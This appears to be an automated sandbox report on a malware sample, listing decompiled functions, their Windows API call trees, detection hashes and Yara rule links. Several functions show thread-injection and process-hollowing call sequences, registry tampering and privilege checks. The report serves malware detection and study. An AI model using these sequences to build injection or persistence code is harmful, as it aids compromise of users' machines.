                      Download Yara Rule
                      APIs
                      • InterlockedIncrement.KERNEL32(0039D1A0), ref: 00372D63
                      • InterlockedDecrement.KERNEL32(0039D1A0), ref: 00372D8A
                      • GetLastError.KERNEL32(?,00000000,?), ref: 003731DA
                        • Part of subcall function 00371473: RtlAllocateHeap.NTDLL(00000000,?), ref: 003714AA
                        • Part of subcall function 00371473: wsprintfA.USER32 ref: 003714CD
                        • Part of subcall function 00371473: HeapFree.KERNEL32(00000000,00000000,?), ref: 003714FE
                        • Part of subcall function 003720AD: lstrlen.KERNEL32(?,?,?,00000001), ref: 00372173
                        • Part of subcall function 003720AD: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00372195
                        • Part of subcall function 003720AD: lstrcpy.KERNEL32(00000020,?), ref: 003721B4
                        • Part of subcall function 003720AD: lstrlen.KERNEL32(?), ref: 003721BE
                        • Part of subcall function 003720AD: memcpy.NTDLL(?,?,?), ref: 003721FF
                        • Part of subcall function 003720AD: memcpy.NTDLL(?,?,?), ref: 00372212
                        • Part of subcall function 003720AD: SwitchToThread.KERNEL32(?,00000000,?,?), ref: 00372236
                        • Part of subcall function 003720AD: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00372255
                        • Part of subcall function 003720AD: HeapFree.KERNEL32(00000000,?,?), ref: 0037227B
                        • Part of subcall function 003720AD: HeapFree.KERNEL32(00000000,?,?), ref: 00372297
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Free$AllocateInterlockedlstrlenmemcpy$DecrementErrorIncrementLastSwitchThreadlstrcpywsprintf
                      • String ID: L"7
                      • API String ID: 2151281825-2580434585
                      • Opcode ID: 3432d12e1259c574f97d1a6f00555934cb215c86a724f7bbe17a60e092ca633b
                      • Instruction ID: b5ce24b59fffbe47cbe916afd140c490d4a550f3ba9dc683fa6951dd82cb7667
                      • Opcode Fuzzy Hash: 3432d12e1259c574f97d1a6f00555934cb215c86a724f7bbe17a60e092ca633b
                      • Instruction Fuzzy Hash: 31E0D8332540445BE7333BB8ACCB8EE276ED681371FA38516F92ED21E0DA2B4D416121
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037C702, Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 262memorystringCOMMON
                      Download Yara Rule
                      APIs
                      • memcpy.NTDLL(?,0039ECBD,0000001A,00000000,?,00000000,0037CD1F,?,00000000), ref: 0037C7B1
                      • lstrlen.KERNEL32(00000008,00000000), ref: 0037C9BC
                        • Part of subcall function 00378138: memset.NTDLL ref: 00378174
                        • Part of subcall function 00378138: HeapFree.KERNEL32(00000000,00000000), ref: 00378191
                        • Part of subcall function 00378138: memcpy.NTDLL(?,?,0037C7DD,?,0037C7DD,?,?,00000000,?,00000000,0037CD1F,?,00000000), ref: 003781B2
                        • Part of subcall function 00377F9C: StrChrA.SHLWAPI(00000001,0000000D), ref: 00377FE6
                        • Part of subcall function 0037C531: WaitForSingleObject.KERNEL32(000001F4), ref: 0037C5B7
                      • HeapFree.KERNEL32(00000000,00000008,?), ref: 0037C96A
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                        • Part of subcall function 0037A9A8: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 0037A9BF
                        • Part of subcall function 0037A9A8: memcpy.NTDLL(?,?,00004000,?,?,0037C95D,?,?), ref: 0037A9FD
                        • Part of subcall function 0037A9A8: HeapFree.KERNEL32(00000000,?), ref: 0037AA1F
                        • Part of subcall function 0037C6D4: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 0037C6F5
                        • Part of subcall function 00378249: memmove.NTDLL(00000000,00000000,00000000,?,00000000,0037AD5C,0039E51C,00000000,00000000,-00000039,?,0037AED1,?,00000000,?,00000000), ref: 0037828F
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Free$memcpy$Allocate$ObjectSingleWaitlstrlenmemmovememset
                      • String ID: Access-Control-Allow-Origin:
                      • API String ID: 1019252088-3194369251
                      • Opcode ID: 92884586d898ad935fecf75ad8daab22b0de3014235acd76109e57a9ab594c35
                      • Instruction ID: 9474fa106ad186c5afeff8b3ef01f0ce36d4d964c8ef7056b293cd9ed4268b8c
                      • Opcode Fuzzy Hash: 92884586d898ad935fecf75ad8daab22b0de3014235acd76109e57a9ab594c35
                      • Instruction Fuzzy Hash: 5AA1AE71610201EFDF66DF65C885AAA7BA8BF08310F159199FC49AF256DB78EC40CF90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038D484, Relevance: 6.1, APIs: 4, Instructions: 108threadsynchronizationinjectionCOMMON
                      Download Yara Rule
                      APIs
                      • memset.NTDLL ref: 0038D4B2
                        • Part of subcall function 0038D2FD: memset.NTDLL ref: 0038D339
                      • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 0038D53C
                      • WaitForSingleObject.KERNEL32(00000064), ref: 0038D54A
                      • SuspendThread.KERNEL32(?), ref: 0038D55D
                        • Part of subcall function 0038CF9B: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0038D0D1
                        • Part of subcall function 0038CF9B: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 0038D122
                        • Part of subcall function 0038CF9B: memcpy.NTDLL(?,0038DC33,00000800,?,?,00000000), ref: 0038D192
                        • Part of subcall function 0038CF9B: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 0038D1CD
                        • Part of subcall function 0038CF9B: RtlNtStatusToDosError.NTDLL(00000000), ref: 0038D1D4
                        • Part of subcall function 0038CF9B: CloseHandle.KERNEL32(00000000), ref: 0038D1E3
                        • Part of subcall function 0038CF9B: memset.NTDLL ref: 0038D1F7
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memcpymemset$Thread$CloseErrorHandleObjectResumeSectionSingleStatusSuspendUnmapViewWait
                      • String ID:
                      • API String ID: 398184711-0
                      • Opcode ID: cc6aecec498ca418648717ae93a6550fd0e8466ac2a24fe7393a832b33eaa0db
                      • Instruction ID: 710afc8388382f9a34c02a8e1c78f84687b45d20501ba752130075006617feeb
                      • Opcode Fuzzy Hash: cc6aecec498ca418648717ae93a6550fd0e8466ac2a24fe7393a832b33eaa0db
                      • Instruction Fuzzy Hash: 904180B1108301AFEB12EF54CC81E6ABBE9FF89354F10492EF695961A0DB31D914CB62
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00632102, Relevance: 6.1, APIs: 4, Instructions: 107threadsynchronizationinjectionCOMMON
                      Download Yara Rule
                      APIs
                      • memset.NTDLL ref: 00632130
                        • Part of subcall function 00631F7B: memset.NTDLL ref: 00631FB7
                      • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 006321BA
                      • WaitForSingleObject.KERNEL32(00000064), ref: 006321C8
                      • SuspendThread.KERNEL32(?), ref: 006321DB
                        • Part of subcall function 00631C29: memcpy.NTDLL(?,CCCCFEEB,?,?,?,00632386,?,00632386,00632386,?,?,?,?,00000000), ref: 00631D5F
                        • Part of subcall function 00631C29: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,00632386,?,00632386,00632386,?,?,?,?,00000000), ref: 00631DB0
                        • Part of subcall function 00631C29: memcpy.NTDLL(?,00632486,00000800,?,?,?,00000000), ref: 00631E20
                        • Part of subcall function 00631C29: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00631E4B
                        • Part of subcall function 00631C29: RtlNtStatusToDosError.NTDLL(00000000), ref: 00631E52
                        • Part of subcall function 00631C29: CloseHandle.KERNEL32(00000000), ref: 00631E61
                        • Part of subcall function 00631C29: memset.NTDLL ref: 00631E75
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: memcpymemset$Thread$CloseErrorHandleObjectResumeSectionSingleStatusSuspendUnmapViewWait
                      • String ID:
                      • API String ID: 398184711-0
                      • Opcode ID: 7bd13bf0a7f48ae9bb82bf3ca4d60127a604c9bbd521bc29df937e8ac838ca4f
                      • Instruction ID: 3f7686a4f0f71c1f4435651ec470583824b68e18a86214a526e7be2e9741a191
                      • Opcode Fuzzy Hash: 7bd13bf0a7f48ae9bb82bf3ca4d60127a604c9bbd521bc29df937e8ac838ca4f
                      • Instruction Fuzzy Hash: F7315E72108302AFE751DF54CD81EABBBEAFF88350F10492DFA9496260D731D964CB96
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00390813, Relevance: 6.1, APIs: 4, Instructions: 106stringCOMMON
                      Download Yara Rule
                      APIs
                      • lstrlen.KERNEL32(00000001,?,00000008), ref: 003907F6
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • mbstowcs.NTDLL ref: 00390814
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      • GetLastError.KERNEL32(?,?,00000001), ref: 00390869
                      • FreeLibrary.KERNEL32(?,?,00000001), ref: 003908D1
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: FreeHeap$AllocateErrorLastLibrarylstrlenmbstowcs
                      • String ID:
                      • API String ID: 3913308073-0
                      • Opcode ID: 80ec4c60937b5c98f603b6de400450befcbf1165b1678a5b1a2ec5e62bce77af
                      • Instruction ID: 9349819328185f6aa4e477b618af789757cff193fcaac24adb6e1de7ef71f60c
                      • Opcode Fuzzy Hash: 80ec4c60937b5c98f603b6de400450befcbf1165b1678a5b1a2ec5e62bce77af
                      • Instruction Fuzzy Hash: 6941E775E00209EFCF16DFE4C8888ADBBB5FF48315B1444A9E515AB651C735AD82CF90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038F58B, Relevance: 6.1, APIs: 4, Instructions: 104stringtimeCOMMON
                      Download Yara Rule
                      APIs
                      • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0038FB3F), ref: 0038F5A1
                      • lstrlen.KERNEL32(?), ref: 0038F5D1
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • memcpy.NTDLL(00000000,?,?), ref: 0038F640
                      • memcpy.NTDLL(00000008,003973F8,00000002,00000000,?,?), ref: 0038F655
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: HeapTimememcpy$AllocateFileFreeSystemlstrlen
                      • String ID:
                      • API String ID: 4127713103-0
                      • Opcode ID: b524bb235cf667ee226b1d35a7b5ecc1b2ff0456312edc5a50240872e9817c91
                      • Instruction ID: 2de0f964e4a3211e5748210a74660cba4c426895bcc0f2985b88d0f627414e18
                      • Opcode Fuzzy Hash: b524bb235cf667ee226b1d35a7b5ecc1b2ff0456312edc5a50240872e9817c91
                      • Instruction Fuzzy Hash: E9311E75A00209EFDB12EFA8CC85EAEB7F8EF44304B114565F815E7251EA34EA158B50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00634253, Relevance: 6.1, APIs: 4, Instructions: 99registrysynchronizationCOMMON
                      Download Yara Rule
                      APIs
                      • RegOpenKeyExA.ADVAPI32(80000003,00000000,00000000,?,00000001,00000000,000000B7,00000001,?,00000000,?,?,00637614), ref: 0063427A
                        • Part of subcall function 0063115F: RtlAllocateHeap.NTDLL(00000000,?,00633BA9), ref: 0063116B
                      • RegEnumKeyExA.ADVAPI32(00000000,?,00000000,00637614,00000000,00000000,00000000,00000000,00000104,00000000,?,00637614), ref: 006342C1
                      • WaitForSingleObject.KERNEL32(00000000,?), ref: 0063432E
                        • Part of subcall function 00631174: HeapFree.KERNEL32(00000000,?,00633C0E), ref: 00631180
                        • Part of subcall function 00632EC0: StrChrA.SHLWAPI(!Cc,0000005F), ref: 00632F03
                        • Part of subcall function 00632EC0: lstrcpy.KERNEL32(?,?), ref: 00632F1B
                        • Part of subcall function 00632EC0: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00632F51
                        • Part of subcall function 00632EC0: lstrlenW.KERNEL32 ref: 00632F88
                        • Part of subcall function 00632EC0: RtlAllocateHeap.NTDLL(00000000,?), ref: 00632F9D
                        • Part of subcall function 00632EC0: CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00632FE8
                        • Part of subcall function 00632EC0: CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00632FFA
                        • Part of subcall function 00632EC0: lstrcmpiW.KERNEL32(00000000), ref: 00633011
                        • Part of subcall function 00632EC0: lstrcpy.KERNEL32(?,006380FA), ref: 00633053
                        • Part of subcall function 00632EC0: lstrcpy.KERNEL32(?,?), ref: 006330AC
                        • Part of subcall function 00632EC0: RegCreateKeyA.ADVAPI32(?,?,?), ref: 006330C0
                        • Part of subcall function 00632EC0: RegQueryValueExA.ADVAPI32(?,00638256,00000000,?,?,?), ref: 006330E3
                        • Part of subcall function 00632EC0: RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?,?,?,?), ref: 00633146
                        • Part of subcall function 00632EC0: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 00633161
                        • Part of subcall function 00632EC0: RegDeleteValueW.ADVAPI32(?,006376D0), ref: 0063316F
                        • Part of subcall function 00632EC0: RegCloseKey.ADVAPI32(?), ref: 00633178
                        • Part of subcall function 00632EC0: RegCloseKey.ADVAPI32(?), ref: 00633181
                        • Part of subcall function 00632EC0: HeapFree.KERNEL32(00000000,?,?), ref: 00633196
                        • Part of subcall function 00632EC0: HeapFree.KERNEL32(00000000,00000000), ref: 006331B9
                        • Part of subcall function 00632EC0: RegCloseKey.ADVAPI32(?), ref: 006331CB
                      • RegCloseKey.ADVAPI32(?,00000104,00000000,?,00637614), ref: 00634356
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$CloseOpen$CreateFreelstrcpy$AllocateDirectoryValue$DeleteEnumObjectQuerySingleWaitlstrcmpilstrlen
                      • String ID:
                      • API String ID: 3364410921-0
                      • Opcode ID: f1b1a1f8126bd404091c84787464dfd4754a576ca010298334b3bf7e837a75da
                      • Instruction ID: 4edb94e524c072aff7d303e1f9bda4afc38582dff1a783323a36519e7ee79752
                      • Opcode Fuzzy Hash: f1b1a1f8126bd404091c84787464dfd4754a576ca010298334b3bf7e837a75da
                      • Instruction Fuzzy Hash: FD311871C00119AADF21AFA6CC858EEFFBAEF49350F10416AF561B3220D6715A50DBD0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00378138, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 97memoryCOMMON
                      Download Yara Rule
                      APIs
                      • memset.NTDLL ref: 00378174
                      • HeapFree.KERNEL32(00000000,00000000), ref: 00378191
                      • memcpy.NTDLL(?,?,0037C7DD,?,0037C7DD,?,?,00000000,?,00000000,0037CD1F,?,00000000), ref: 003781B2
                        • Part of subcall function 00377F9C: StrChrA.SHLWAPI(00000001,0000000D), ref: 00377FE6
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: FreeHeapmemcpymemset
                      • String ID: chun
                      • API String ID: 2272576838-3058818181
                      • Opcode ID: a338dacef09c8b8556f679da493ed00119669e6bd68b41139c4ae3a232eea705
                      • Instruction ID: d78fe96b7ad19afcff204642b7321ff226b53350f30a3bce2f15484b2e40b521
                      • Opcode Fuzzy Hash: a338dacef09c8b8556f679da493ed00119669e6bd68b41139c4ae3a232eea705
                      • Instruction Fuzzy Hash: 80318D31644705AFDB339F66DC45B16BBE8EF14720F01882AF94E9B661DB74E902CB90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 003911F6, Relevance: 6.1, APIs: 4, Instructions: 95librarystringCOMMON
                      Download Yara Rule
                      APIs
                      • lstrlenW.KERNEL32(?,00000000,?,?,?,003916D0,?,0039F9E0), ref: 00391203
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,003916D0,?,0039F9E0), ref: 0039122C
                      • LoadLibraryW.KERNEL32(-0000FFFE), ref: 0039126F
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      • FreeLibrary.KERNEL32(00000000,?,?,?,003916D0,?,0039F9E0), ref: 00391301
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: FreeHeapLibrary$AllocateCurrentDirectoryLoadlstrlen
                      • String ID:
                      • API String ID: 4161714574-0
                      • Opcode ID: df683ca6b1f4b3331f93e812596bd0265654d4325c3dcc21670c7785df002300
                      • Instruction ID: e40b9a2ffd763f62484c0918a00d292cb363342e3359e89062502a5a3270232d
                      • Opcode Fuzzy Hash: df683ca6b1f4b3331f93e812596bd0265654d4325c3dcc21670c7785df002300
                      • Instruction Fuzzy Hash: F3318C71914707BFDB236F659C85A9BBBECEF04390F018826F445E2691DB75D8108BA4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00633789, Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                      Download Yara Rule
                      APIs
                      • memset.NTDLL ref: 006337AB
                      • GetLastError.KERNEL32(?,00000318,00000008), ref: 0063389E
                        • Part of subcall function 00633D34: RtlNtStatusToDosError.NTDLL(00000000), ref: 00633D6C
                        • Part of subcall function 00633D34: SetLastError.KERNEL32(00000000), ref: 00633D73
                        • Part of subcall function 00633C91: RtlNtStatusToDosError.NTDLL(00000000), ref: 00633CA9
                      • memcpy.NTDLL(00000218,00634E62,00000100,?,00010003,?,?,00000318,00000008), ref: 00633826
                        • Part of subcall function 00633CF3: RtlNtStatusToDosError.NTDLL(C0000002), ref: 00633D20
                        • Part of subcall function 00633CF3: SetLastError.KERNEL32(00000000,?,006319D6,?,00000004,0063244E,00000004,?,?,?,?,006322FD,00000000,0063244E,CCCCFEEB,00000000), ref: 00633D27
                      • RtlNtStatusToDosError.NTDLL(00000000), ref: 00633880
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: Error$Status$Last$memcpymemset
                      • String ID:
                      • API String ID: 945571674-0
                      • Opcode ID: 62ba75bb9486e843b1ba3f2530d48286ccfd1534e5aaea40af4bb3e05d2eef7f
                      • Instruction ID: 8db0eb0341f9fe764f881fd6f56fb9403ad1820a069e5191bd122eef0344bc5b
                      • Opcode Fuzzy Hash: 62ba75bb9486e843b1ba3f2530d48286ccfd1534e5aaea40af4bb3e05d2eef7f
                      • Instruction Fuzzy Hash: 64313C7190161AAFDB21DF64CD85AEAB7BAFF04304F10496EF546E6750DB30AE448B90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00388D0F, Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                      Download Yara Rule
                      APIs
                      • memset.NTDLL ref: 00388D31
                      • GetLastError.KERNEL32(?,00000318,00000008), ref: 00388E24
                        • Part of subcall function 00389524: RtlNtStatusToDosError.NTDLL(00000000), ref: 0038955C
                        • Part of subcall function 00389524: SetLastError.KERNEL32(00000000), ref: 00389563
                        • Part of subcall function 00389481: RtlNtStatusToDosError.NTDLL(00000000), ref: 00389499
                      • memcpy.NTDLL(00000218,00395622,00000100,?,00010003,00083097,?,00000318,00000008), ref: 00388DAC
                        • Part of subcall function 003894E3: RtlNtStatusToDosError.NTDLL(C0000002), ref: 00389510
                        • Part of subcall function 003894E3: SetLastError.KERNEL32(00000000,?,00388DE7,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 00389517
                      • RtlNtStatusToDosError.NTDLL(00000000), ref: 00388E06
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Error$Status$Last$memcpymemset
                      • String ID:
                      • API String ID: 945571674-0
                      • Opcode ID: f6d0d979cb577ea4111cd1900400f69f0ebc2da22aebd98a83c0b16ff18aebe9
                      • Instruction ID: 43d31f916cd0ef0d3b438aa389929c6b74a9165aa151214d19728e0e5a8dbd4e
                      • Opcode Fuzzy Hash: f6d0d979cb577ea4111cd1900400f69f0ebc2da22aebd98a83c0b16ff18aebe9
                      • Instruction Fuzzy Hash: 8831A47190030AEFDB22EF64DC85AAAB7F8FF04304F5045AAE546D7141EB30EE448B50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00376855, Relevance: 6.1, APIs: 4, Instructions: 83memoryregistryCOMMON
                      Download Yara Rule
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 003768AE
                      • memcpy.NTDLL(00000018,?,?), ref: 003768D7
                      • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_0000579A,00000000,000000FF,00000008), ref: 00376916
                      • HeapFree.KERNEL32(00000000,00000000), ref: 00376929
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
                      • String ID:
                      • API String ID: 2780211928-0
                      • Opcode ID: eb21587d1d766b41c202fcec182a14b65f893840ff09eb8613b8e19b9cf41827
                      • Instruction ID: 25917f1f7f7f18cb05cf4f89aa78f2795ac8f72aa7b50341e9994a8cb716f496
                      • Opcode Fuzzy Hash: eb21587d1d766b41c202fcec182a14b65f893840ff09eb8613b8e19b9cf41827
                      • Instruction Fuzzy Hash: AD318271600705AFDB229F25DC56E9A7BACFF19320F00852AF95AD62A0D775EC11CBA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00391309, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • memset.NTDLL ref: 00391333
                      • lstrlen.KERNEL32(003914A3,00000001,00000000,00000000,00000000,00000000,00002000,00000000,R9,?,?,?,?,?,?,003914A3), ref: 00391347
                      • memcpy.NTDLL(00000000,?,?), ref: 0039139C
                        • Part of subcall function 00389765: lstrlen.KERNEL32(00000000,~FvR9,00000000,00000000,00374E8A,00000000,00000000,00000000,00000000,0037D7DB,00000000,00000000,?,00000001,0037D9CC), ref: 0038976E
                        • Part of subcall function 00389765: memcpy.NTDLL(00000000,?,00000000,00000001,?,00000001,0037D9CC), ref: 00389791
                        • Part of subcall function 00389765: memset.NTDLL ref: 003897A0
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heaplstrlenmemcpymemset$AllocateFree
                      • String ID: R9
                      • API String ID: 320756535-134138977
                      • Opcode ID: e385b007723a1d37d335eda87d95d6bc4f5148f4662f6b67c5a6c0f8170f7839
                      • Instruction ID: 2d3210c0ecc66d6dedb28ed150f1703b23f2e73b13aba5fc8444b218d790bf6a
                      • Opcode Fuzzy Hash: e385b007723a1d37d335eda87d95d6bc4f5148f4662f6b67c5a6c0f8170f7839
                      • Instruction Fuzzy Hash: 8221FAB5900219BFDF12AFA9CC85AEEBBBCFF08340F104469F915E6101E7359A548BA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00633E06, Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                      Download Yara Rule
                      APIs
                      • OpenProcessToken.ADVAPI32(000000FF,00020008,00637614,00000000), ref: 00633E38
                      • CloseHandle.KERNEL32(00637614), ref: 00633EB8
                        • Part of subcall function 0063115F: RtlAllocateHeap.NTDLL(00000000,?,00633BA9), ref: 0063116B
                      • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00633E93
                      • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00633EA3
                        • Part of subcall function 00631174: HeapFree.KERNEL32(00000000,?,00633C0E), ref: 00631180
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: AuthorityHeap$AllocateCloseCountFreeHandleOpenProcessToken
                      • String ID:
                      • API String ID: 3879210718-0
                      • Opcode ID: 3f4d6b2bc6495443baa15f31283f62275ceb14e713a6978a10adda392949d33b
                      • Instruction ID: dd0b81fc88949d7776b11ceedd99bc7cbaafccec0e6e01c4e2d68d9dc7543acf
                      • Opcode Fuzzy Hash: 3f4d6b2bc6495443baa15f31283f62275ceb14e713a6978a10adda392949d33b
                      • Instruction Fuzzy Hash: 32213C75900219FFEB119FA4DD45EEEBBBAEB49304F1040A6F910A6261C7715F44EFA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037E3C1, Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                      Download Yara Rule
                      APIs
                      • RtlEnterCriticalSection.NTDLL(0039D43C), ref: 0037E3D7
                      • RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0037E3F2
                      • GetLastError.KERNEL32 ref: 0037E460
                        • Part of subcall function 0037E2B8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 0037E339
                        • Part of subcall function 0037E2B8: RtlAllocateHeap.NTDLL(00000000,?), ref: 0037E369
                        • Part of subcall function 0037E2B8: memcpy.NTDLL(00000000,?,?), ref: 0037E37A
                      • GetLastError.KERNEL32 ref: 0037E46F
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalErrorLastSection$AllocateEnterHeapLeavememcpy
                      • String ID:
                      • API String ID: 2031912846-0
                      • Opcode ID: 3717c1c74f88c8b4000dc021fbf482d8d778c2310b9dfcb23f787fac0905cb24
                      • Instruction ID: 2078e6a5af35d7b5b740c65fa2b943342d13df9f0f42357b1b1289ee00e4dea9
                      • Opcode Fuzzy Hash: 3717c1c74f88c8b4000dc021fbf482d8d778c2310b9dfcb23f787fac0905cb24
                      • Instruction Fuzzy Hash: 15213D76500208EFCB23CFA9DC45A9E7BB8FF48710F158196F95993260CB35E915EB90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00377501, Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON
                      Download Yara Rule
                      APIs
                      • memset.NTDLL ref: 00377523
                        • Part of subcall function 0037BFC2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 0037BFDE
                        • Part of subcall function 0037BFC2: GetLastError.KERNEL32(?,?,00373DFB,0000012B,0039D244,?,?,?,00373E29,00000000,00000000,00000000,00000000), ref: 0037BFE9
                        • Part of subcall function 0037BFC2: WaitNamedPipeA.KERNEL32(00002710), ref: 0037C00B
                        • Part of subcall function 0037BFC2: WaitForSingleObject.KERNEL32(00000000), ref: 0037C019
                      • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 00377567
                      • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 003775AD
                      • CloseHandle.KERNEL32(?), ref: 003775D0
                        • Part of subcall function 003775E0: GetTickCount.KERNEL32(00000000,00000000,00000000,L"7,00372CFD,00000000), ref: 003775F0
